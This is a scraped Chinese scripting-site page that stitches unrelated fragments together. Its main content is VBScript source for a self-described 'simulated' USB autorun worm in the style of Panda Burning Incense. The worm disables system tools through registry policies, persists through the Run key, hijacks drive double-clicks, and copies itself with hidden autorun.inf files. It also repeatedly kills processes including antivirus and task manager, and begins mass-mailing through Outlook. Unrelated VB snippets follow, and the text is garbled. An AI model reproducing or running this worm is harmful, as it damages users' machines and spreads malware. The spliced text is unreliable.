明日之后电脑版脚本法拉利一体

发布时间:2020-09-02 来源:脚本之家 点击:

每行中用逗号分隔下列各项:字段名.字段类型.字段长度(如果不是字符型字段,就留空,仅用逗号分隔)及字段描述使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到CDE和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒和部分熊猫烧香功能,本人能力有限,只能模拟这样的病毒了,声明,本人模拟这个病毒,全是为了学习和技术,切忌不要搞破坏,如果有人用本人代码破坏,后果自负onerrorresumenext
dimfso,wsh,myfile,ws,pp,fsoFolder
setwsh=wscript.createobject("wscript.shell")
setfso=wscript.createobject("scripting.filesystemobject")
setmyfile=fso.GetFile(wscript.scriptfullname)
'修改注册表(开始菜单里面的东西和IE各项设置)
wsh.Regwrite"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoFileOpen",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\Advanced",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\CacheInternet",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\AutoConfig",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\HomePage",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\History",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\ConnwizAdminLock",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\InternetExplorer\Main\StartPage",""
wsh.Regwrite"HKCU\Software\Microsoft\InternetExplorer\Main\SearchPage",""
wsh.Regwrite"HKCU\Software\Microsoft\InternetExplorer\Main\Default_Page_URL",""
wsh.Regwrite"HKCU\Software\Microsoft\InternetExplorer\Main\Default_Search_URL",""
wsh.Regwrite"HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\StartPage",""
wsh.Regwrite"HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\Default_Page_URL",""
wsh.Regwrite"HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\Default_Search_URL",""
wsh.Regwrite"HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\SearchPage",""
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\HomePage",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\SecurityTab",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoViewSource",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","c:\NYboy.vbs"
wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.Regwrite"HKLM\SOFTWARE\Classes\Drive\shell\auto\command","C:\NYboy.bat'%1'"
wsh.Regwrite"HKCR\Drive\shell","auto"
wsh.Regwrite"HKCR\Drive\shell\auto\command","C:\NYboy.bat'%1'"
wsh.Regwrite"HKLM\SOFTWARE\Classes\Directory\shell","auto"
wsh.Regwrite"HKCR\Directory\shell\auto\command","C:\NYboy.bat'%1'"
wsh.Regwrite"HKLM\SOFTWARE\Classes\Directory\shell\auto\command","C:\NYboy.bat'%1'"
'修改默认文件图标 这里可以换成可爱的熊猫哦
wsh.Regwrite"HKCR\exefile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKCR\txtfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKCR\dllfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKCR\batfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKCR\inifile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\SOFTWARE\Classes\exefile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\SOFTWARE\Classes\txtfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\SOFTWARE\Classes\dllfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\SOFTWARE\Classes\batfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\SOFTWARE\Classes\inifile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\Software\CLASSES\.reg","txtfile"
wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊,大兵和你开个小小的玩笑"
wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了,赶快杀毒或者与QQ252287438联系"
'复制自身到C,D,E,F,U盘
myfile.copy"c:"
myfile.copy"D:"
myfile.copy"E:"
myfile.copy"F:"
myfile.copy"I:"
myfile.attributes=34
'定义Autorun.inf的内容 这个就是u盘病毒必须的代码部分 这里可以简单写
Iffso.FileExists("C:\autorun.inf")Then
SetobjFolder=fso.GetFile("C:\autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>C:\autorun.inf"_
&"&&echoopen=NYboy.bat>>C:\autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>C:\autorun.inf"_
&"&&echoshell\Auto\command=NYboy.bat>>C:\autorun.inf"_
&"&&echoshell=Auto>>C:\autorun.inf"_
&"&&attrib+h+s+rC:\autorun.inf"
setautobatc=fso.createtextfile("c:\NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
EndIf
Iffso.FileExists("D:\autorun.inf")Then
SetobjFolder=fso.GetFile("D:\autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>D:\autorun.inf"_
&"&&echoopen=NYboy.bat>>D:\autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>D:\autorun.inf"_
&"&&echoshell\Auto\command=NYboy.bat>>D:\autorun.inf"_
&"&&echoshell=Auto>>D:\autorun.inf"_
&"&&attrib+h+s+rD:\autorun.inf"
setautobatd=fso.createtextfile("D:\NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
EndIf
Iffso.FileExists("E:\autorun.inf")Then
SetobjFolder=fso.GetFile("E:\autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>E:\autorun.inf"_
&"&&echoopen=NYboy.bat>>E:\autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>E:\autorun.inf"_
&"&&echoshell\Auto\command=NYboy.bat>>E:\autorun.inf"_
&"&&echoshell=Auto>>E:\autorun.inf"_
&"&&attrib+h+s+rE:\autorun.inf"
setautobate=fso.createtextfile("E:\NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
EndIf
Iffso.FileExists("F:\autorun.inf")Then
SetobjFolder=fso.GetFile("F:\autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>F:\autorun.inf"_
&"&&echoopen=NYboy.bat>>F:\autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>F:\autorun.inf"_
&"&&echoshell\Auto\command=NYboy.bat>>F:\autorun.inf"_
&"&&echoshell=Auto>>F:\autorun.inf"_
&"&&attrib+h+s+rF:\autorun.inf"
setautobatf=fso.createtextfile("F:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
EndIf
Iffso.FileExists("I:\autorun.inf")Then
SetobjFolder=fso.GetFile("I:\autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>I:\autorun.inf"_
&"&&echoopen=NYboy.bat>>I:\autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>I:\autorun.inf"_
&"&&echoshell\Auto\command=NYboy.bat>>I:\autorun.inf"_
&"&&echoshell=Auto>>I:\autorun.inf"_
&"&&attrib+h+s+rI:\autorun.inf"
setautobatf=fso.createtextfile("I:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
EndIf
'设置病毒体属性为 系统 只读 隐藏
wsh.run"cmd/cattrib+h+s+rC:\NYboy.bat"_
&"&&attrib+h+s+rD:\NYboy.bat"_
&"&&attrib+h+s+rE:\NYboy.bat"_
&"&&attrib+h+s+rF:\NYboy.bat"_
&"&&attrib+h+s+rI:\NYboy.bat"
'强制结束某些进程,比如QQ,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
do
setws=getobject("winmgmts:\\.\root\cimv2")
setpp=ws.execquery("select*fromwin32_processwherename='taskmgr.exe'orName='QQ.exe'orName='notepad.exe'orName='IEXPLORE.exe'orName='cmd.exe'orName='avp.exe'orName='winRAR.exe'orName='realplay.exe'orName='WINWORD.exe'")
foreachiinpp
i.terminate()
wscript.sleep100
next
loop
'使病毒可以靠邮件传播
Setol=CreateObject("Outlook.Application")
OnErrorResumeNext
Forx=1To5
SetMail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="今晚你来吗?"
Mail.Body="朋友你好:您的朋友给您发来了热情的邀请

10S广告脚本

Function DeleteLine(strFile, strKey, LineNumber, CheckCase)
'DeleteLine Function by TomRiddle 2008

'Remove line(s) containing text (strKey) from text file (strFile)
'or
'Remove line number from text file (strFile)
'or
'Remove line number if containing text (strKey) from text file (strFile)

'Use strFile="c:\file.txt" (Full path to text file)
'Use strKey="John Doe" (Lines containing this text string to be deleted)
'Use strKey="" (To not use keyword search)
'Use LineNumber="1" (Enter specific line number to delete)
'Use LineNumber="0" (To ignore line numbers)
'Use CheckCase="1" (For case sensitive search )
'Use CheckCase="0" (To ignore upper/lower case characters)


Const ForReading=1:Const ForWriting=2
Dim objFSO,objFile,Count,strLine,strLineCase,strNewFile
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objFile=objFSO.OpenTextFile(strFile,ForReading)
Do Until objFile.AtEndOfStream
strLine=objFile.Readline
If CheckCase=0 then strLineCase=ucase(strLine):strKey=ucase(strKey)
If LineNumber=objFile.Line-1 or LineNumber=0 then
If instr(strLine,strKey) or instr(strLineCase,strkey) or strKey="" then
strNewFile=strNewFile
Else
strNewFile=strNewFile&strLine&vbcrlf
End If
Else
strNewFile=strNewFile&strLine&vbcrlf
End If
Loop
objFile.Close
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objFile=objFSO.OpenTextFile(strFile,ForWriting)
objFile.Write strNewFile
objFile.Close

End Function
->PublicSubFillList(ListControlAsListBox,ParamArrayItems())
DimiAsVariant
WithListControl
.Clear
ForEachiInItems
.AddItemi
Next
EndWith
EndSub

PrivateSubCommand1_Click()
FillListList1,"TiffanyT","MikeS","RochesterNY"
EndSub->
->

1. Asc(x),Chr(x):转换字符,字符码
2. Filter:搜寻字符串数组中的特定字符串
格式:v=filter(x,s[,include[,compare]])
实例:
Dim x()=
Dim v
v=filter(x,"kj") '结果v(0)="kjwang",v(1)="wangkj"
v=filter(x,"kj",false) '结果v(0)="peter"
v=filter(x,"kj",true,vbTextCompare) '不分大小写搜寻
3. InStr:寻找字符串位置(InstrRev:倒过来寻找字符串)
格式:
v=instr(x,y) '从x字符串第1个字符起找出y字符串出现的位置
v=instr(n,x,y) '从x字符串第n个字符起找出y字符串出现的位置
格式:
v=InstrRev(x,s[,n[,Compare]])
4. Join:将字符串连接
格式:v=join(x[,d])'d为分隔字符
5. Len(x):计算字符串x的长度
格式:v=len(x)
6. Left(x,n):返回字符串x左边n个字符(对应Right(x,n))
7. Mid:读取字符串x中间的字符
格式:v=mid(x,n,m)
8. LTrim(x),RTim(x),Trim(x)去空白字符
9. Replace:字符串取代
格式:v=Replace(x,s,r)
实例:x="i saw a saw a saw"
v=replace(x,"saw","so") 'v="i so a so a so"
10. Split:字符串分割
格式:v=split(s[,d])
实例:v=split("vb.net,iis6.0,asp.net",",")
'结果v(0)="vb.net",v(1)="iis6.0",v(2)="asp.net"
11. StrReverse:反转字符串
实例:v=strreverse("kjwang") 'v="gnawjk"
12. UCase(x),LCase(x):变换英文字母的大小写
实例:x="hello,VB中文!"
v=UCase(x) 'v="HELLO,VB中文


  (3)声明中的ByVal是作什么用的

  这跟VB的参数传递方式有关,在默认情况下VB是通过地址传递方式传递函数的参数、而有些API函数要求必须采用传值方式来传递函数参数(这两种参数传递方式是不同的,前者传递的是一个指针,而后者要求是参数真实的值)

"
strSoundFile="D:\Music\MyMusic.wpl"'自动播放列表地址
strCommand="wmplayer.exe/prefetch:1/TaskMediaLibrary"&Chr(34)&strSoundFile&Chr(34)'播放音乐
strCommand2="taskkill/imwmplayer.exe"'关闭音乐程序
Fori=1To12'12为提醒的次数
WScript.Sleep(1000*60*j)
MsgBoxalertText,64
objShell.RunstrCommand,1,False
WScript.Sleep(1000*60*n)
objShell.RunstrCommand2,0,True
MsgBoxalertText2,64
Next
'/////////////////////////////代码结束
那我会使用Pixels来做二者的转换,Pixels一个点便是一个点,所以X,Y轴的单位是相同
的,当然,使用Twips也可以,只是如果中间有用上API,人家大多以Pixels为单位

VK_MEDIA_NEXT_TRACK (0xB0)
Windows 2000/XP: Next Track key

php守护进程法我们在很多时候都需要那种无Icon的窗口,如“关于……”“查找”等
OptionExplicit
OnErrorResumeNext
Subinclude(vbs)
Dimfso:Setfso=CreateObject("scripting.FileSystemObject")
Dimp:p=Split(Wscript.ScriptFullName,"")
p(UBound(p))=vbs
p=Join(p,"")
Dimf:Setf=fso.OpenTextFile(p)
Executef.ReadAll()
'ExecuteGlobalf.ReadAll()
f.Close()
Setf=Nothing
Setfso=Nothing
'Wscript.Echo(p)
EndSub

include("1.vbs")
include("2.vbs")
'IfErrThen
'Wscript.Echo(Err.description)
'Wscript.Quit()
'EndIf
Wscript.Echo(a+b)

1.vbs
a=3

2.vbs
b=4


网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号